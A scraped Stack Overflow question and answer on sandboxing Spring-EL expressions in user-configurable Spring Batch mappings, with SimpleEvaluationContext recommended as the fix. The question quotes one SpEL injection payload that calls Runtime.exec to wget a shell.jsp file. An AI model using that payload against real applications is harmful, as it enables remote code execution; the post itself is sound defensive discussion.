Can Spring-EL expressions be executed within a sandbox?











up vote
0
down vote

favorite












I am using Spring-EL to create dynamic csv-field to class-field mappings used in different Spring-Batch import jobs. (Different input files, same output classes). This is working very good but the idea is that it must be possible for a user to create such a mapping configuration.



The problem is that the Spring-EL expressions are not executed inside a kind of sandbox and therefor it is very easy to inject evil code. For example:



name: T(java.lang.Runtime).getRuntime().exec("wget http://localhost:8090/shell.jsp")



My question is, how can I run Spring-EL inside some kind of sandbox or restrict access to only a specific set of methods/classes? I cannot find any thing related to this topic. Are maybe Spring-EL is not the right choice for the job.



Example of what I try to achieve:



name: column[0]
category: concat(' ', column[18], column[19])
age: split(column[3], '/', 0)









share|improve this question




















  • 1




    docs.spring.io/spring/docs/5.1.2.RELEASE/…. See SimpleEvaluationContext
    – Artem Bilan
    Nov 19 at 15:06










  • Thanks! Now using SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();
    – Mark Ebbers
    Nov 19 at 16:01















up vote
0
down vote

favorite












I am using Spring-EL to create dynamic csv-field to class-field mappings used in different Spring-Batch import jobs. (Different input files, same output classes). This is working very good but the idea is that it must be possible for a user to create such a mapping configuration.



The problem is that the Spring-EL expressions are not executed inside a kind of sandbox and therefor it is very easy to inject evil code. For example:



name: T(java.lang.Runtime).getRuntime().exec("wget http://localhost:8090/shell.jsp")



My question is, how can I run Spring-EL inside some kind of sandbox or restrict access to only a specific set of methods/classes? I cannot find any thing related to this topic. Are maybe Spring-EL is not the right choice for the job.



Example of what I try to achieve:



name: column[0]
category: concat(' ', column[18], column[19])
age: split(column[3], '/', 0)









share|improve this question




















  • 1




    docs.spring.io/spring/docs/5.1.2.RELEASE/…. See SimpleEvaluationContext
    – Artem Bilan
    Nov 19 at 15:06










  • Thanks! Now using SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();
    – Mark Ebbers
    Nov 19 at 16:01













up vote
0
down vote

favorite









up vote
0
down vote

favorite











I am using Spring-EL to create dynamic csv-field to class-field mappings used in different Spring-Batch import jobs. (Different input files, same output classes). This is working very good but the idea is that it must be possible for a user to create such a mapping configuration.



The problem is that the Spring-EL expressions are not executed inside a kind of sandbox and therefor it is very easy to inject evil code. For example:



name: T(java.lang.Runtime).getRuntime().exec("wget http://localhost:8090/shell.jsp")



My question is, how can I run Spring-EL inside some kind of sandbox or restrict access to only a specific set of methods/classes? I cannot find any thing related to this topic. Are maybe Spring-EL is not the right choice for the job.



Example of what I try to achieve:



name: column[0]
category: concat(' ', column[18], column[19])
age: split(column[3], '/', 0)









share|improve this question















I am using Spring-EL to create dynamic csv-field to class-field mappings used in different Spring-Batch import jobs. (Different input files, same output classes). This is working very good but the idea is that it must be possible for a user to create such a mapping configuration.



The problem is that the Spring-EL expressions are not executed inside a kind of sandbox and therefor it is very easy to inject evil code. For example:



name: T(java.lang.Runtime).getRuntime().exec("wget http://localhost:8090/shell.jsp")



My question is, how can I run Spring-EL inside some kind of sandbox or restrict access to only a specific set of methods/classes? I cannot find any thing related to this topic. Are maybe Spring-EL is not the right choice for the job.



Example of what I try to achieve:



name: column[0]
category: concat(' ', column[18], column[19])
age: split(column[3], '/', 0)






spring sandbox spring-el






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited Nov 19 at 15:08

























asked Nov 19 at 15:03









Mark Ebbers

154




154








  • 1




    docs.spring.io/spring/docs/5.1.2.RELEASE/…. See SimpleEvaluationContext
    – Artem Bilan
    Nov 19 at 15:06










  • Thanks! Now using SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();
    – Mark Ebbers
    Nov 19 at 16:01














  • 1




    docs.spring.io/spring/docs/5.1.2.RELEASE/…. See SimpleEvaluationContext
    – Artem Bilan
    Nov 19 at 15:06










  • Thanks! Now using SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();
    – Mark Ebbers
    Nov 19 at 16:01








1




1




docs.spring.io/spring/docs/5.1.2.RELEASE/…. See SimpleEvaluationContext
– Artem Bilan
Nov 19 at 15:06




docs.spring.io/spring/docs/5.1.2.RELEASE/…. See SimpleEvaluationContext
– Artem Bilan
Nov 19 at 15:06












Thanks! Now using SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();
– Mark Ebbers
Nov 19 at 16:01




Thanks! Now using SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();
– Mark Ebbers
Nov 19 at 16:01












1 Answer
1






active

oldest

votes

















up vote
1
down vote



accepted










The SimpleEvaluationContext has been designed to decrease application vulnerabilities.



See https://docs.spring.io/spring/docs/5.1.2.RELEASE/spring-framework-reference/core.html#expressions-evaluation-context for more info:




SimpleEvaluationContext is designed to support only a subset of the SpEL language syntax. It excludes Java type references, constructors, and bean references. It also requires you to explicitly choose the level of support for properties and methods in expressions. By default, the create() static factory method enables only read access to properties.







share|improve this answer





















    Your Answer






    StackExchange.ifUsing("editor", function () {
    StackExchange.using("externalEditor", function () {
    StackExchange.using("snippets", function () {
    StackExchange.snippets.init();
    });
    });
    }, "code-snippets");

    StackExchange.ready(function() {
    var channelOptions = {
    tags: "".split(" "),
    id: "1"
    };
    initTagRenderer("".split(" "), "".split(" "), channelOptions);

    StackExchange.using("externalEditor", function() {
    // Have to fire editor after snippets, if snippets enabled
    if (StackExchange.settings.snippets.snippetsEnabled) {
    StackExchange.using("snippets", function() {
    createEditor();
    });
    }
    else {
    createEditor();
    }
    });

    function createEditor() {
    StackExchange.prepareEditor({
    heartbeatType: 'answer',
    convertImagesToLinks: true,
    noModals: true,
    showLowRepImageUploadWarning: true,
    reputationToPostImages: 10,
    bindNavPrevention: true,
    postfix: "",
    imageUploader: {
    brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
    contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
    allowUrls: true
    },
    onDemand: true,
    discardSelector: ".discard-answer"
    ,immediatelyShowMarkdownHelp:true
    });


    }
    });














     

    draft saved


    draft discarded


















    StackExchange.ready(
    function () {
    StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53377386%2fcan-spring-el-expressions-be-executed-within-a-sandbox%23new-answer', 'question_page');
    }
    );

    Post as a guest















    Required, but never shown

























    1 Answer
    1






    active

    oldest

    votes








    1 Answer
    1






    active

    oldest

    votes









    active

    oldest

    votes






    active

    oldest

    votes








    up vote
    1
    down vote



    accepted










    The SimpleEvaluationContext has been designed to decrease application vulnerabilities.



    See https://docs.spring.io/spring/docs/5.1.2.RELEASE/spring-framework-reference/core.html#expressions-evaluation-context for more info:




    SimpleEvaluationContext is designed to support only a subset of the SpEL language syntax. It excludes Java type references, constructors, and bean references. It also requires you to explicitly choose the level of support for properties and methods in expressions. By default, the create() static factory method enables only read access to properties.







    share|improve this answer

























      up vote
      1
      down vote



      accepted










      The SimpleEvaluationContext has been designed to decrease application vulnerabilities.



      See https://docs.spring.io/spring/docs/5.1.2.RELEASE/spring-framework-reference/core.html#expressions-evaluation-context for more info:




      SimpleEvaluationContext is designed to support only a subset of the SpEL language syntax. It excludes Java type references, constructors, and bean references. It also requires you to explicitly choose the level of support for properties and methods in expressions. By default, the create() static factory method enables only read access to properties.







      share|improve this answer























        up vote
        1
        down vote



        accepted







        up vote
        1
        down vote



        accepted






        The SimpleEvaluationContext has been designed to decrease application vulnerabilities.



        See https://docs.spring.io/spring/docs/5.1.2.RELEASE/spring-framework-reference/core.html#expressions-evaluation-context for more info:




        SimpleEvaluationContext is designed to support only a subset of the SpEL language syntax. It excludes Java type references, constructors, and bean references. It also requires you to explicitly choose the level of support for properties and methods in expressions. By default, the create() static factory method enables only read access to properties.







        share|improve this answer












        The SimpleEvaluationContext has been designed to decrease application vulnerabilities.



        See https://docs.spring.io/spring/docs/5.1.2.RELEASE/spring-framework-reference/core.html#expressions-evaluation-context for more info:




        SimpleEvaluationContext is designed to support only a subset of the SpEL language syntax. It excludes Java type references, constructors, and bean references. It also requires you to explicitly choose the level of support for properties and methods in expressions. By default, the create() static factory method enables only read access to properties.








        share|improve this answer












        share|improve this answer



        share|improve this answer










        answered Nov 19 at 16:04









        Artem Bilan

        62.5k84567




        62.5k84567






























             

            draft saved


            draft discarded



















































             


            draft saved


            draft discarded














            StackExchange.ready(
            function () {
            StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53377386%2fcan-spring-el-expressions-be-executed-within-a-sandbox%23new-answer', 'question_page');
            }
            );

            Post as a guest















            Required, but never shown





















































            Required, but never shown














            Required, but never shown












            Required, but never shown







            Required, but never shown

































            Required, but never shown














            Required, but never shown












            Required, but never shown







            Required, but never shown







            Popular posts from this blog

            404 Error Contact Form 7 ajax form submitting

            How to know if a Active Directory user can login interactively

            Refactoring coordinates for Minecraft Pi buildings written in Python